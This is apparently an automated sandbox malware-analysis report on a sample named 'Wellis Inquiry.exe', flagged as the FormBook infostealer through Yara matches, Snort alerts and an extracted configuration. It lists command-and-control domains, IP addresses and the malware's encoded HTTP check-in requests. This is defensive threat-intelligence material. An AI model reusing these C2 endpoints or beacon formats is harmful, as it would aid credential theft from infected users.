Source: Yara match	File source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY

Source: 3.2.Wellis Inquiry.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: Wellis Inquiry.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Wellis Inquiry.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cmmon32.pdb source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Wellis Inquiry.exe, 00000003.00000002.746125583.00000000012AF000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Wellis Inquiry.exe, cmmon32.exe

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 4x nop then pop edi		3_2_004162C8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop edi		11_2_02D362C8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49808 -> 183.90.240.3:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49808 -> 183.90.240.3:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49808 -> 183.90.240.3:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49818 -> 151.106.117.36:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49818 -> 151.106.117.36:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49818 -> 151.106.117.36:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49842 -> 199.59.242.153:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49842 -> 199.59.242.153:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49842 -> 199.59.242.153:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.marunouchi1.com
Source: C:\Windows\explorer.exe	Network Connect: 183.90.240.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 151.106.117.36 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.richartware.com
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ebookgratis.online
Source: C:\Windows\explorer.exe	Network Connect: 199.59.242.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ovmfinacial.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.blackmagiccomics.com
Source: C:\Windows\explorer.exe	Domain query: www.psychedeliccosmetics.com
Source: C:\Windows\explorer.exe	Domain query: www.dollpartyla.com
Source: C:\Windows\explorer.exe	Domain query: www.aceserial.xyz
Source: C:\Windows\explorer.exe	Network Connect: 104.21.2.218 80	Jump to behavior

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe

DNS query: www.aceserial.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.psychedeliccosmetics.com/ag9v/

Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: SAKURA-CSAKURAInternetIncJP SAKURA-CSAKURAInternetIncJP

Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.marunouchi1.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.psychedeliccosmetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.aceserial.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.ebookgratis.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.ovmfinacial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=K9/CDnPG5wdyl4CHzmgShg3gLBJ4YNT1Y6jAhZ/FXp8/egWH1BEUOuCtjJEICRxztW+Z&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.dollpartyla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 199.59.242.153 199.59.242.153

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 14 Oct 2021 05:29:51 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Thu, 14 Oct 2021 05:29:57 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 14 Oct 2021 05:30:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 189X-Sorting-Hat-ShopId: 59880997054X-Request-ID: ff951e54-78cb-49de-931e-6e9b39ead4a9X-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Dc: gcp-europe-west1CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 69de6a78386b698b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">

Source: Wellis Inquiry.exe, 00000000.00000003.655430474.0000000006353000.00000004.00000001.sdmp	String found in binary or memory: http://en.wikip
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com/
Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comf
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comtal
Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comw.m
Source: Wellis Inquiry.exe, 00000000.00000002.673404245.00000000081A0000.00000004.00020000.sdmp	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Wellis Inquiry.exe, 00000000.00000002.672511476.0000000006330000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comion
Source: Wellis Inquiry.exe, 00000000.00000002.672511476.0000000006330000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.como
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp, Wellis Inquiry.exe, 00000000.00000003.659071283.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y03
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/a-e
Source: Wellis Inquiry.exe, 00000000.00000003.658754582.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/i
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ita
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/G
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/i
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/tu
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com3
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.comd
Source: Wellis Inquiry.exe, 00000000.00000003.656690322.000000000633A000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Wellis Inquiry.exe, 00000000.00000003.656404711.000000000634B000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com51
Source: Wellis Inquiry.exe, 00000000.00000003.656404711.000000000634B000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comy
Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.net
Source: Wellis Inquiry.exe, 00000000.00000003.655882162.000000000634B000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.net4?
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.neth?
Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netiv
Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netrz
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: cmmon32.exe, 0000000B.00000002.923291558.0000000004D62000.00000004.00020000.sdmp	String found in binary or memory: https://bitninja.io

Source: unknown

DNS traffic detected: queries for: www.marunouchi1.com

Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.marunouchi1.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.psychedeliccosmetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.aceserial.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.ebookgratis.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.ovmfinacial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ag9v/?9rq=K9/CDnPG5wdyl4CHzmgShg3gLBJ4YNT1Y6jAhZ/FXp8/egWH1BEUOuCtjJEICRxztW+Z&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.dollpartyla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
